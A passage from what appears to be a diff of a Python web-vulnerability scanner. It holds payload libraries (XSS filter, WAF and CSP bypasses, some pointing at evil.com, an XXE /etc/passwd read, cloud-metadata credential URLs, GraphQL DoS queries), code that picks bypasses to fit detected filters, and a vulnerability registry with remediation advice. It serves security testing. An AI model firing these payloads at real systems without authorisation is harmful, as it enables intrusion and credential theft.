"a" * 10000, "\x00\x01\x02", "NaN", "undefined",
],
"sensitive_data_exposure": [], # Inspection-based
"information_disclosure": [
"/.git/config", "/.git/HEAD", "/.svn/entries",
"/.env", "/robots.txt", "/sitemap.xml",
"/crossdomain.xml", "/.DS_Store",
],
"api_key_exposure": [], # JS analysis, not payloads
"source_code_disclosure": [
"/.git/config", "/.git/HEAD", "/app.js.map",
"/main.js.map", "/index.php.bak", "/config.php~",
"/web.config.old", "/backup.zip",
],
"backup_file_exposure": [
"/backup.sql", "/dump.sql", "/database.sql",
"/backup.zip", "/backup.tar.gz", "/site.zip",
"/db_backup.sql", "/backup/latest.sql",
],
"version_disclosure": [], # Header inspection
# Crypto & Supply
"weak_encryption": [], # TLS inspection
"weak_hashing": [], # Hash analysis
"weak_random": [], # Token collection
"cleartext_transmission": [], # HTTP inspection
"vulnerable_dependency": [], # Version fingerprinting
"outdated_component": [
"/readme.html", "/CHANGELOG.md", "/VERSION",
"/license.txt",
],
"insecure_cdn": [], # Script tag inspection
"container_escape": [], # Container inspection
# Cloud & API
"s3_bucket_misconfiguration": [], # External check
"cloud_metadata_exposure": [
"http://169.254.169.254/latest/meta-data/",
"http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"http://metadata.google.internal/computeMetadata/v1/",
],
"serverless_misconfiguration": [], # Config inspection
"graphql_introspection": [
'{__schema{queryType{name},mutationType{name},types{name,kind,fields{name,type{name,kind,ofType{name}}}}}}',
'{__type(name:"User"){fields{name,type{name}}}}',
],
"graphql_dos": [
'{"query":"{' + 'user{posts{comments{author' * 5 + '}}}}}' + '}' * 4 + '"}',
],
"rest_api_versioning": [
"/api/v1/", "/api/v0/", "/v1/", "/api/1.0/",
],
"soap_injection": [
"?wsdl",
'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><soap:Envelope><soap:Body>&xxe;</soap:Body></soap:Envelope>',
],
"api_rate_limiting": [], # Rapid request testing
"excessive_data_exposure": [], # Response analysis
# ===== XSS BYPASS PAYLOAD LIBRARIES =====
"xss_bypass_event_handlers": [
"<svg onload=alert(1)>",
"<body onload=alert(1)>",
"<input onfocus=alert(1) autofocus>",
"<details open ontoggle=alert(1)>",
"<marquee onstart=alert(1)>",
"<video><source onerror=alert(1)>",
"<audio src=x onerror=alert(1)>",
"<select onfocus=alert(1) autofocus>",
"<textarea onfocus=alert(1) autofocus>",
"<input onblur=alert(1) autofocus><input autofocus>",
"<div contenteditable onblur=alert(1)>x</div>",
"<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
"<svg><set onbegin=alert(1) attributename=x to=1>",
"<svg><animatetransform onbegin=alert(1) attributename=x>",
"<xss autofocus tabindex=1 onfocus=alert(1)></xss>",
"<xss id=x onfocus=alert(1) tabindex=1>#x</xss>",
"<input type=image src=x onerror=alert(1)>",
"<object data=x onerror=alert(1)>",
"<style>@keyframes x{}</style><xss style='animation-name:x' onanimationend=alert(1)>",
"<xss onpointerover=alert(1)>hover</xss>",
],
"xss_bypass_custom_tags": [
"<xss autofocus tabindex=1 onfocus=alert(1)></xss>",
"<xss id=x onfocus=alert(1) tabindex=1>#x</xss>",
"<xss onpointerover=alert(1)>hover me</xss>",
"<xss onfocusin=alert(1) tabindex=1>focus me</xss>",
"<custom autofocus tabindex=1 onfocus=alert(1)></custom>",
"<math><mi onfocus=alert(1) tabindex=1>x</mi></math>",
"<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click</text></a></svg>",
"<svg><discard onbegin=alert(1)>",
"<svg><animate onbegin=alert(1) attributeName=x>",
],
"xss_bypass_alert_blocked": [
"<img src=x onerror=confirm(1)>",
"<img src=x onerror=prompt(1)>",
"<img src=x onerror=print()>",
"<img src=x onerror=alert`1`>",
"<img src=x onerror=window['al'+'ert'](1)>",
"<img src=x onerror=self['alert'](1)>",
"<img src=x onerror=top['alert'](1)>",
"<img src=x onerror=eval(atob('YWxlcnQoMSk='))>",
"<img src=x onerror=eval('\\141\\154\\145\\162\\164(1)')>",
"<img src=x onerror=Function('alert(1)')()>",
"<img src=x onerror=[].constructor.constructor('alert(1)')()>",
"<img src=x onerror=setTimeout('alert(1)')>",
],
"xss_bypass_encoding": [
"<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>",
"<img src=x onerror=&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;>",
"<a href=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)>click</a>",
"<a href=&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;alert(1)>click</a>",
"<a href=java%0ascript:alert(1)>click</a>",
"<a href=java%09script:alert(1)>click</a>",
"<a href=java%0dscript:alert(1)>click</a>",
"<svg onload=al\\u0065rt(1)>",
"<img src=x onerror=al\\u0065rt(1)>",
],
"xss_bypass_waf": [
"<Img Src=x OnError=alert(1)>",
"<IMG SRC=x ONERROR=alert(1)>",
"<img/src=x/onerror=alert(1)>",
"<img\\tsrc=x\\tonerror=alert(1)>",
"<img\\nsrc=x\\nonerror=alert(1)>",
"<<script>alert(1)//<</script>",
"<svg/onload=alert(1)>",
"<body/onload=alert(1)>",
"<input/onfocus=alert(1)/autofocus>",
"<scr<script>ipt>alert(1)</scr</script>ipt>",
],
"xss_context_event_handler": [
"alert(1)",
"alert(document.domain)",
"alert`1`",
"confirm(1)",
"prompt(1)",
],
"xss_context_svg": [
"<svg onload=alert(1)>",
"<svg><animate onbegin=alert(1) attributeName=x dur=1s>",
"<svg><set onbegin=alert(1) attributename=x to=1>",
"<svg><animatetransform onbegin=alert(1) attributename=x>",
"<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click</text></a></svg>",
],
"xss_context_textarea": [
"</textarea><script>alert(1)</script>",
"</textarea><img src=x onerror=alert(1)>",
"</textarea><svg onload=alert(1)>",
],
"xss_context_style": [
"</style><script>alert(1)</script>",
"</style><img src=x onerror=alert(1)>",
],
"xss_csp_bypass": [
"<script src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.min.js'></script><div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>",
"<base href='//evil.com/'>",
"<script nonce='{{RANDOM_ID}}'>alert(1)</script>",
"<link rel=prefetch href='//evil.com/'>",
],
"xss_dom_sources": [
"#<img src=x onerror=alert(1)>",
"#\"><img src=x onerror=alert(1)>",
"javascript:alert(1)",
"#'-alert(1)-'",
"?default=<script>alert(1)</script>",
"<img src=x onerror=alert(1)>",
],
"xss_canonical_accesskey": [
"<input accesskey=x onclick=alert(1)>",
"<a href=# accesskey=x onclick=alert(1)>press ALT+SHIFT+X</a>",
],
}
def get_context_payloads(self, context: str) -> List[str]:
    """Get payloads for a detected injection context.

    Supports enhanced context names from _detect_xss_context_enhanced():
        html_body, html_comment, textarea, title, noscript,
        attribute_double, attribute_single, attribute_unquoted,
        js_string_single, js_string_double, js_template_literal,
        href, script_src, event_handler, svg_context, mathml_context, style

    Resolution order:
        1. Exact library key ("xss_context_<context>").
        2. Fallback alias for enhanced context names.
        3. First 10 stored-XSS payloads as a last resort.
    """
    # Direct match first
    key = f"xss_context_{context}"
    if key in self.payload_libraries:
        return list(self.payload_libraries[key])
    # Alias map for enhanced context names. Identity entries (e.g.
    # "event_handler" -> "event_handler") were removed as dead code: any
    # context whose own library key exists is caught by the direct match
    # above, and when the key is absent the identity alias would just fall
    # through to the same ultimate fallback.
    _fallback = {
        "attribute_double": "attribute",
        "attribute_single": "attribute",
        "attribute_unquoted": "attribute",
        "js_string_single": "js_string",
        "js_string_double": "js_string",
        "js_template_literal": "template_literal",
        "html_comment": "html_body",
        "title": "textarea",  # needs closing tag breakout like textarea
        "noscript": "textarea",  # needs closing tag breakout
        "script_src": "href",  # URL-like context
        "svg_context": "svg",
        "mathml_context": "html_body",
    }
    fallback_ctx = _fallback.get(context)
    if fallback_ctx:
        fb_key = f"xss_context_{fallback_ctx}"
        if fb_key in self.payload_libraries:
            return list(self.payload_libraries[fb_key])
    # Ultimate fallback: top stored XSS payloads
    return list(self.payload_libraries.get("xss_stored", []))[:10]
def get_filter_bypass_payloads(self, filter_map: Dict[str, Any]) -> List[str]:
    """Get bypass payloads based on what's blocked/allowed by filters.

    filter_map keys:
        - allowed_chars: list of chars that pass through (currently unused)
        - blocked_chars: list of chars that are stripped/encoded
        - allowed_tags: list of HTML tags that survive
        - blocked_tags: list of HTML tags that are stripped
        - allowed_events: list of event handlers that survive
        - blocked_events: list of event handlers stripped
        - csp: CSP header value (or None)
        - waf_detected: bool

    Returns a de-duplicated, order-preserving list of payload strings.
    """
    payloads: List[str] = []
    blocked_chars = set(filter_map.get("blocked_chars", []))
    allowed_tags = filter_map.get("allowed_tags", [])
    allowed_events = filter_map.get("allowed_events", [])
    # Build tag/event combinations from what the filter lets through.
    for tag in allowed_tags:
        for evt in (allowed_events or ["onfocus", "onload", "onerror"]):
            if tag in ("svg", "body", "math") and evt == "onload":
                payloads.append(f"<{tag} {evt}=alert(1)>")
            elif tag in ("img", "video", "audio", "source", "object", "input") and evt == "onerror":
                payloads.append(f"<{tag} src=x {evt}=alert(1)>")
            elif evt == "onfocus":
                payloads.append(f"<{tag} {evt}=alert(1) autofocus tabindex=1></{tag}>")
            elif evt == "onbegin":
                payloads.append(f"<svg><{tag} {evt}=alert(1)>")
            elif evt == "onanimationend":
                payloads.append(f"<style>@keyframes x{{}}</style><{tag} style='animation-name:x' {evt}=alert(1)>")
            else:
                payloads.append(f"<{tag} {evt}=alert(1)></{tag}>")
    # Always include the generic event-handler and custom-tag bypasses.
    payloads.extend(self.payload_libraries.get("xss_bypass_event_handlers", []))
    payloads.extend(self.payload_libraries.get("xss_bypass_custom_tags", []))
    # If parentheses are blocked, use backtick/encoding variants
    if "(" in blocked_chars or ")" in blocked_chars:
        payloads.extend(self.payload_libraries.get("xss_bypass_alert_blocked", []))
    # If angle brackets are partially blocked, try encoding
    if "<" in blocked_chars or ">" in blocked_chars:
        payloads.extend(self.payload_libraries.get("xss_bypass_encoding", []))
    # WAF-specific bypasses
    if filter_map.get("waf_detected", False):
        payloads.extend(self.payload_libraries.get("xss_bypass_waf", []))
    # CSP bypass payloads
    if filter_map.get("csp"):
        payloads.extend(self.payload_libraries.get("xss_csp_bypass", []))
    # dict.fromkeys de-duplicates while preserving first-seen order.
    return list(dict.fromkeys(payloads))
async def get_payloads(
self,
vuln_type: str,
+222 -10
View File
@@ -11,23 +11,52 @@ from backend.core.vuln_engine.testers.injection import (
SQLiErrorTester, SQLiUnionTester, SQLiBlindTester, SQLiTimeTester,
CommandInjectionTester, SSTITester, NoSQLInjectionTester
)
from backend.core.vuln_engine.testers.advanced_injection import (
LdapInjectionTester, XpathInjectionTester, GraphqlInjectionTester,
CrlfInjectionTester, HeaderInjectionTester, EmailInjectionTester,
ELInjectionTester, LogInjectionTester, HtmlInjectionTester,
CsvInjectionTester, OrmInjectionTester
)
from backend.core.vuln_engine.testers.file_access import (
LFITester, RFITester, PathTraversalTester, XXETester, FileUploadTester
LFITester, RFITester, PathTraversalTester, XXETester, FileUploadTester,
ArbitraryFileReadTester, ArbitraryFileDeleteTester, ZipSlipTester
)
from backend.core.vuln_engine.testers.request_forgery import (
SSRFTester, CSRFTester
SSRFTester, CSRFTester, GraphqlIntrospectionTester, GraphqlDosTester
)
from backend.core.vuln_engine.testers.auth import (
AuthBypassTester, JWTManipulationTester, SessionFixationTester
AuthBypassTester, JWTManipulationTester, SessionFixationTester,
WeakPasswordTester, DefaultCredentialsTester, TwoFactorBypassTester,
OauthMisconfigTester
)
from backend.core.vuln_engine.testers.authorization import (
IDORTester, BOLATester, PrivilegeEscalationTester
IDORTester, BOLATester, PrivilegeEscalationTester,
BflaTester, MassAssignmentTester, ForcedBrowsingTester
)
from backend.core.vuln_engine.testers.client_side import (
CORSTester, ClickjackingTester, OpenRedirectTester
CORSTester, ClickjackingTester, OpenRedirectTester,
DomClobberingTester, PostMessageVulnTester, WebsocketHijackTester,
PrototypePollutionTester, CssInjectionTester, TabnabbingTester
)
from backend.core.vuln_engine.testers.infrastructure import (
SecurityHeadersTester, SSLTester, HTTPMethodsTester
SecurityHeadersTester, SSLTester, HTTPMethodsTester,
DirectoryListingTester, DebugModeTester, ExposedAdminPanelTester,
ExposedApiDocsTester, InsecureCookieFlagsTester
)
from backend.core.vuln_engine.testers.logic import (
RaceConditionTester, BusinessLogicTester, RateLimitBypassTester,
ParameterPollutionTester, TypeJugglingTester, TimingAttackTester,
HostHeaderInjectionTester, HttpSmugglingTester, CachePoisoningTester
)
from backend.core.vuln_engine.testers.data_exposure import (
SensitiveDataExposureTester, InformationDisclosureTester,
ApiKeyExposureTester, SourceCodeDisclosureTester,
BackupFileExposureTester, VersionDisclosureTester
)
from backend.core.vuln_engine.testers.cloud_supply import (
S3BucketMisconfigTester, CloudMetadataExposureTester,
SubdomainTakeoverTester, VulnerableDependencyTester,
ContainerEscapeTester, ServerlessMisconfigTester
)
@@ -323,11 +352,102 @@ class VulnerabilityRegistry:
"description": "Flaw in application's business logic allowing unintended behavior.",
"impact": "Varies based on specific flaw - could range from minor to critical impact.",
"remediation": "1. Review business logic flows\n2. Implement comprehensive validation\n3. Add server-side checks for all rules\n4. Test edge cases and negative scenarios"
}
},
# ===== NEW TYPES (68 additional) =====
# Advanced Injection
"ldap_injection": {"title": "LDAP Injection", "severity": "high", "cwe_id": "CWE-90", "description": "User input injected into LDAP queries allowing directory enumeration or auth bypass.", "impact": "Directory enumeration, authentication bypass, data extraction from LDAP stores.", "remediation": "1. Escape LDAP special characters\n2. Use parameterized LDAP queries\n3. Validate input against whitelist\n4. Apply least privilege to LDAP accounts"},
"xpath_injection": {"title": "XPath Injection", "severity": "high", "cwe_id": "CWE-643", "description": "User input injected into XPath queries manipulating XML data retrieval.", "impact": "Extraction of XML data, authentication bypass via XPath condition manipulation.", "remediation": "1. Use parameterized XPath queries\n2. Validate and sanitize input\n3. Avoid string concatenation in XPath\n4. Limit XPath query privileges"},
"graphql_injection": {"title": "GraphQL Injection", "severity": "high", "cwe_id": "CWE-89", "description": "Injection attacks targeting GraphQL endpoints through malicious queries or variables.", "impact": "Schema exposure, unauthorized data access, denial of service via complex queries.", "remediation": "1. Disable introspection in production\n2. Implement query depth/complexity limits\n3. Use persisted queries\n4. Apply field-level authorization"},
"crlf_injection": {"title": "CRLF Injection / HTTP Response Splitting", "severity": "medium", "cwe_id": "CWE-93", "description": "Injection of CRLF characters to manipulate HTTP response headers or split responses.", "impact": "HTTP header injection, session fixation via Set-Cookie, XSS via response splitting.", "remediation": "1. Strip \\r\\n from user input in headers\n2. Use framework header-setting functions\n3. Validate header values\n4. Implement WAF rules for CRLF patterns"},
"header_injection": {"title": "HTTP Header Injection", "severity": "medium", "cwe_id": "CWE-113", "description": "User input reflected in HTTP headers enabling header manipulation.", "impact": "Password reset poisoning, cache poisoning, access control bypass via header manipulation.", "remediation": "1. Validate Host header against whitelist\n2. Don't use Host header for URL generation\n3. Strip CRLF from header values\n4. Use absolute URLs for sensitive operations"},
"email_injection": {"title": "Email Header Injection", "severity": "medium", "cwe_id": "CWE-93", "description": "Injection of email headers through form fields that feed into mail functions.", "impact": "Spam relay, phishing via injected CC/BCC recipients, email content manipulation.", "remediation": "1. Validate email addresses strictly\n2. Strip CRLF from email inputs\n3. Use email library APIs not raw headers\n4. Implement rate limiting on email features"},
"expression_language_injection": {"title": "Expression Language Injection", "severity": "critical", "cwe_id": "CWE-917", "description": "Injection of EL/SpEL/OGNL expressions evaluated server-side in Java applications.", "impact": "Remote code execution, server compromise, data exfiltration via expression evaluation.", "remediation": "1. Disable EL evaluation on user input\n2. Use strict sandboxing\n3. Update frameworks (Struts2 OGNL patches)\n4. Validate input before template rendering"},
"log_injection": {"title": "Log Injection / Log4Shell", "severity": "high", "cwe_id": "CWE-117", "description": "Injection into application logs enabling log forging or JNDI-based RCE (Log4Shell).", "impact": "Log tampering, JNDI-based RCE (Log4Shell), log analysis tool exploitation.", "remediation": "1. Strip newlines from log input\n2. Update Log4j to 2.17+ (CVE-2021-44228)\n3. Disable JNDI lookups\n4. Use structured logging"},
"html_injection": {"title": "HTML Injection", "severity": "medium", "cwe_id": "CWE-79", "description": "Injection of HTML markup into web pages without script execution.", "impact": "Content spoofing, phishing form injection, defacement, link manipulation.", "remediation": "1. HTML-encode all user output\n2. Use Content-Security-Policy\n3. Implement output encoding libraries\n4. Sanitize HTML with whitelist approach"},
"csv_injection": {"title": "CSV/Formula Injection", "severity": "medium", "cwe_id": "CWE-1236", "description": "Injection of spreadsheet formulas into data exported as CSV/Excel.", "impact": "Code execution when CSV opened in Excel, DDE attacks, data exfiltration via formulas.", "remediation": "1. Prefix cells starting with =,+,-,@ with single quote\n2. Sanitize formula characters\n3. Use safe CSV export libraries\n4. Warn users about untrusted CSV files"},
"orm_injection": {"title": "ORM Injection", "severity": "high", "cwe_id": "CWE-89", "description": "Injection through ORM query builders via operator injection or raw query manipulation.", "impact": "Data extraction, authentication bypass through ORM filter manipulation.", "remediation": "1. Use ORM built-in parameter binding\n2. Avoid raw queries with user input\n3. Validate filter operators\n4. Use field-level whitelists"},
# XSS Advanced
"blind_xss": {"title": "Blind Cross-Site Scripting", "severity": "high", "cwe_id": "CWE-79", "description": "XSS payload stored and executed in backend/admin context not visible to the attacker.", "impact": "Admin session hijacking, backend system compromise, persistent access to admin panels.", "remediation": "1. Sanitize all input regardless of display context\n2. Implement CSP on admin panels\n3. Use HttpOnly cookies\n4. Review admin panel input rendering"},
"mutation_xss": {"title": "Mutation XSS (mXSS)", "severity": "high", "cwe_id": "CWE-79", "description": "XSS via browser HTML mutation where sanitized HTML changes to executable form after DOM processing.", "impact": "Bypasses HTML sanitizers, executes JavaScript through browser parsing quirks.", "remediation": "1. Update DOMPurify/sanitizers\n2. Use textContent not innerHTML\n3. Avoid innerHTML re-serialization\n4. Test with multiple browsers"},
# File Access Advanced
"arbitrary_file_read": {"title": "Arbitrary File Read", "severity": "high", "cwe_id": "CWE-22", "description": "Reading arbitrary files via API or download endpoints outside intended scope.", "impact": "Access to credentials, configuration, source code, private keys.", "remediation": "1. Validate file paths against whitelist\n2. Use chroot/jail\n3. Implement proper access controls\n4. Avoid user input in file paths"},
"arbitrary_file_delete": {"title": "Arbitrary File Delete", "severity": "high", "cwe_id": "CWE-22", "description": "Deleting arbitrary files through path traversal in delete operations.", "impact": "Denial of service, security bypass by deleting .htaccess/config, data destruction.", "remediation": "1. Validate file paths strictly\n2. Use indirect references\n3. Implement soft-delete\n4. Restrict delete operations to specific directories"},
"zip_slip": {"title": "Zip Slip (Archive Path Traversal)", "severity": "high", "cwe_id": "CWE-22", "description": "Path traversal via crafted archive filenames writing files outside extraction directory.", "impact": "Arbitrary file write, web shell deployment, configuration overwrite.", "remediation": "1. Validate archive entry names\n2. Resolve and check extraction paths\n3. Use secure archive extraction libraries\n4. Extract to isolated directories"},
# Auth Advanced
"weak_password": {"title": "Weak Password Policy", "severity": "medium", "cwe_id": "CWE-521", "description": "Application accepts weak passwords that can be easily guessed or brute-forced.", "impact": "Account compromise through password guessing, credential stuffing success.", "remediation": "1. Enforce minimum 8+ character passwords\n2. Check against breached password databases\n3. Implement password strength meter\n4. Follow NIST SP 800-63B guidelines"},
"default_credentials": {"title": "Default Credentials", "severity": "critical", "cwe_id": "CWE-798", "description": "Application or service uses default factory credentials that haven't been changed.", "impact": "Complete unauthorized access to admin or management interfaces.", "remediation": "1. Force password change on first login\n2. Remove default accounts\n3. Implement strong default password generation\n4. Regular credential audits"},
"brute_force": {"title": "Brute Force Vulnerability", "severity": "medium", "cwe_id": "CWE-307", "description": "Login endpoint lacks rate limiting or account lockout allowing unlimited password attempts.", "impact": "Account compromise through automated password guessing.", "remediation": "1. Implement account lockout after N failures\n2. Add rate limiting per IP and per account\n3. Implement CAPTCHA after failures\n4. Use progressive delays"},
"two_factor_bypass": {"title": "Two-Factor Authentication Bypass", "severity": "high", "cwe_id": "CWE-287", "description": "Second authentication factor can be bypassed through implementation flaws.", "impact": "Account takeover even when 2FA is enabled, defeating the purpose of MFA.", "remediation": "1. Enforce 2FA check on all authenticated routes\n2. Use server-side session state for 2FA completion\n3. Rate limit code attempts\n4. Make codes single-use with short expiry"},
"oauth_misconfiguration": {"title": "OAuth Misconfiguration", "severity": "high", "cwe_id": "CWE-601", "description": "OAuth implementation flaws allowing redirect URI manipulation, state bypass, or token theft.", "impact": "Account takeover via stolen OAuth tokens, cross-site request forgery.", "remediation": "1. Strictly validate redirect_uri\n2. Require and validate state parameter\n3. Use PKCE for public clients\n4. Validate all OAuth scopes"},
# Authorization Advanced
"bfla": {"title": "Broken Function Level Authorization", "severity": "high", "cwe_id": "CWE-285", "description": "Admin API functions accessible to regular users without proper role checks.", "impact": "Privilege escalation to admin functionality, system configuration changes.", "remediation": "1. Implement role-based access control on all endpoints\n2. Deny by default\n3. Centralize authorization logic\n4. Audit all admin endpoints"},
"mass_assignment": {"title": "Mass Assignment", "severity": "high", "cwe_id": "CWE-915", "description": "Application binds user-supplied data to internal model fields without filtering.", "impact": "Privilege escalation, data manipulation, bypassing business rules.", "remediation": "1. Use explicit field whitelists\n2. Implement DTOs for input\n3. Validate all bound fields\n4. Use strong parameter filtering"},
"forced_browsing": {"title": "Forced Browsing / Broken Access Control", "severity": "medium", "cwe_id": "CWE-425", "description": "Direct URL access to restricted resources that should require authorization.", "impact": "Access to admin panels, sensitive files, debug interfaces, and internal tools.", "remediation": "1. Implement authentication on all protected routes\n2. Return 404 instead of 403 for sensitive paths\n3. Remove unnecessary files\n4. Use web server access controls"},
# Client-Side Advanced
"dom_clobbering": {"title": "DOM Clobbering", "severity": "medium", "cwe_id": "CWE-79", "description": "HTML injection that overrides JavaScript DOM properties through named elements.", "impact": "JavaScript logic bypass, potential XSS through clobbered variables.", "remediation": "1. Use strict variable declarations (const/let)\n2. Avoid global variable references\n3. Use safe DOM APIs\n4. Sanitize HTML input"},
"postmessage_vulnerability": {"title": "postMessage Vulnerability", "severity": "medium", "cwe_id": "CWE-346", "description": "postMessage handlers that don't validate message origin allowing cross-origin data injection.", "impact": "Cross-origin data injection, XSS via injected data, sensitive data exfiltration.", "remediation": "1. Always validate event.origin\n2. Validate message data structure\n3. Use specific target origins\n4. Minimize data sent via postMessage"},
"websocket_hijacking": {"title": "Cross-Site WebSocket Hijacking", "severity": "high", "cwe_id": "CWE-1385", "description": "WebSocket endpoints accepting connections from arbitrary origins without validation.", "impact": "Real-time data theft, message injection, session hijacking via WebSocket.", "remediation": "1. Validate Origin header on WebSocket upgrade\n2. Require authentication per-message\n3. Implement CSRF protection for handshake\n4. Use WSS (encrypted)"},
"prototype_pollution": {"title": "Prototype Pollution", "severity": "high", "cwe_id": "CWE-1321", "description": "Injection of properties into JavaScript Object.prototype through merge/extend operations.", "impact": "Authentication bypass, RCE via gadget chains, denial of service.", "remediation": "1. Freeze Object.prototype\n2. Sanitize __proto__ and constructor keys\n3. Use Map instead of plain objects\n4. Update vulnerable libraries"},
"css_injection": {"title": "CSS Injection", "severity": "medium", "cwe_id": "CWE-79", "description": "Injection of CSS code through user input reflected in style contexts.", "impact": "Data exfiltration via CSS selectors, UI manipulation, phishing.", "remediation": "1. Sanitize CSS properties\n2. Use CSP style-src\n3. Avoid user input in style attributes\n4. Whitelist safe CSS properties"},
"tabnabbing": {"title": "Reverse Tabnabbing", "severity": "low", "cwe_id": "CWE-1022", "description": "Links with target=_blank without rel=noopener allowing opener tab navigation.", "impact": "Phishing via original tab replacement with fake login page.", "remediation": "1. Add rel='noopener noreferrer' to target=_blank links\n2. Use frameworks that add it automatically\n3. Audit user-generated links"},
# Infrastructure Advanced
"directory_listing": {"title": "Directory Listing Enabled", "severity": "low", "cwe_id": "CWE-548", "description": "Web server auto-indexing enabled exposing directory file structure.", "impact": "Exposure of file structure, sensitive files, backup files, and configuration.", "remediation": "1. Disable directory listing (Options -Indexes)\n2. Add index files to all directories\n3. Review web server configuration\n4. Use custom error pages"},
"debug_mode": {"title": "Debug Mode Enabled", "severity": "high", "cwe_id": "CWE-489", "description": "Application running in debug/development mode in production.", "impact": "Source code exposure, interactive console access, credential disclosure.", "remediation": "1. Disable debug mode in production\n2. Use environment-specific configuration\n3. Implement custom error pages\n4. Remove debug endpoints"},
"exposed_admin_panel": {"title": "Exposed Administration Panel", "severity": "medium", "cwe_id": "CWE-200", "description": "Admin panel accessible from public internet without IP restrictions.", "impact": "Brute force target, credential theft, administration access if default creds.", "remediation": "1. Restrict admin access by IP/VPN\n2. Use strong authentication + 2FA\n3. Change default admin paths\n4. Implement rate limiting"},
"exposed_api_docs": {"title": "Exposed API Documentation", "severity": "low", "cwe_id": "CWE-200", "description": "API documentation (Swagger/OpenAPI/GraphQL playground) publicly accessible.", "impact": "Complete API endpoint mapping, parameter discovery, potential unauthorized access.", "remediation": "1. Disable API docs in production\n2. Require authentication for docs\n3. Disable GraphQL introspection\n4. Use API gateway access controls"},
"insecure_cookie_flags": {"title": "Insecure Cookie Configuration", "severity": "medium", "cwe_id": "CWE-614", "description": "Session cookies missing security flags (Secure, HttpOnly, SameSite).", "impact": "Cookie theft via XSS (no HttpOnly), MITM (no Secure), CSRF (no SameSite).", "remediation": "1. Set HttpOnly on session cookies\n2. Set Secure flag on HTTPS sites\n3. Set SameSite=Lax or Strict\n4. Review all cookie configurations"},
"http_smuggling": {"title": "HTTP Request Smuggling", "severity": "high", "cwe_id": "CWE-444", "description": "Discrepancy between front-end and back-end HTTP parsing enabling request smuggling.", "impact": "Cache poisoning, request hijacking, authentication bypass, response queue poisoning.", "remediation": "1. Use HTTP/2 end-to-end\n2. Normalize Content-Length/Transfer-Encoding\n3. Reject ambiguous requests\n4. Update proxy/server software"},
"cache_poisoning": {"title": "Web Cache Poisoning", "severity": "high", "cwe_id": "CWE-444", "description": "Manipulation of cached responses via unkeyed inputs to serve malicious content.", "impact": "Mass XSS via cached responses, redirect poisoning, denial of service.", "remediation": "1. Include all inputs in cache key\n2. Validate unkeyed headers\n3. Use Vary header correctly\n4. Implement cache key normalization"},
# Logic & Data
"rate_limit_bypass": {"title": "Rate Limit Bypass", "severity": "medium", "cwe_id": "CWE-770", "description": "Rate limiting can be bypassed through header manipulation or request variation.", "impact": "Enables brute force attacks, API abuse, and denial of service.", "remediation": "1. Rate limit by authenticated user, not just IP\n2. Don't trust X-Forwarded-For for rate limiting\n3. Implement at multiple layers\n4. Use sliding window algorithms"},
"parameter_pollution": {"title": "HTTP Parameter Pollution", "severity": "medium", "cwe_id": "CWE-235", "description": "Duplicate parameters exploit parsing differences between front-end and back-end.", "impact": "WAF bypass, logic bypass, access control circumvention.", "remediation": "1. Normalize parameters server-side\n2. Reject duplicate parameters\n3. Use consistent parsing\n4. Test with duplicate params"},
"type_juggling": {"title": "Type Juggling / Type Coercion", "severity": "high", "cwe_id": "CWE-843", "description": "Loose type comparison exploited to bypass authentication or security checks.", "impact": "Authentication bypass, security check circumvention via type confusion.", "remediation": "1. Use strict comparison (=== in PHP/JS)\n2. Validate input types\n3. Use strong typing\n4. Hash comparison with timing-safe functions"},
"insecure_deserialization": {"title": "Insecure Deserialization", "severity": "critical", "cwe_id": "CWE-502", "description": "Untrusted data deserialized without validation enabling code execution.", "impact": "Remote code execution, denial of service, authentication bypass.", "remediation": "1. Don't deserialize untrusted data\n2. Use JSON instead of native serialization\n3. Implement integrity checks\n4. Restrict deserialization types"},
"subdomain_takeover": {"title": "Subdomain Takeover", "severity": "high", "cwe_id": "CWE-284", "description": "Dangling DNS records pointing to unclaimed cloud resources.", "impact": "Domain impersonation, phishing, cookie theft, authentication bypass.", "remediation": "1. Audit DNS records regularly\n2. Remove dangling CNAME records\n3. Monitor cloud resource lifecycle\n4. Use DNS monitoring tools"},
"host_header_injection": {"title": "Host Header Injection", "severity": "medium", "cwe_id": "CWE-644", "description": "Host header value used in URL generation enabling poisoning attacks.", "impact": "Password reset poisoning, cache poisoning, SSRF via Host header.", "remediation": "1. Validate Host against allowed values\n2. Use absolute URLs from configuration\n3. Don't use Host header for URL generation\n4. Implement ALLOWED_HOSTS"},
"timing_attack": {"title": "Timing Attack", "severity": "medium", "cwe_id": "CWE-208", "description": "Response time variations leak information about valid usernames or secret values.", "impact": "Username enumeration, token/password character extraction.", "remediation": "1. Use constant-time comparison for secrets\n2. Normalize response times\n3. Add random delays\n4. Use same code path for valid/invalid input"},
"improper_error_handling": {"title": "Improper Error Handling", "severity": "low", "cwe_id": "CWE-209", "description": "Verbose error messages disclosing internal information in production.", "impact": "Source path disclosure, database details, technology stack exposure aiding further attacks.", "remediation": "1. Use custom error pages in production\n2. Log errors server-side only\n3. Return generic error messages\n4. Disable debug/stack trace output"},
"sensitive_data_exposure": {"title": "Sensitive Data Exposure", "severity": "high", "cwe_id": "CWE-200", "description": "Sensitive data (PII, credentials, tokens) exposed in responses, URLs, or storage.", "impact": "Identity theft, account compromise, regulatory violations (GDPR, HIPAA).", "remediation": "1. Minimize data in API responses\n2. Encrypt sensitive data at rest/transit\n3. Remove sensitive data from URLs\n4. Implement data classification"},
"information_disclosure": {"title": "Information Disclosure", "severity": "low", "cwe_id": "CWE-200", "description": "Unintended exposure of internal details: versions, paths, technology stack.", "impact": "Aids further attacks with technology-specific exploits and internal knowledge.", "remediation": "1. Remove version headers\n2. Disable directory listing\n3. Remove HTML comments\n4. Secure .git and config files"},
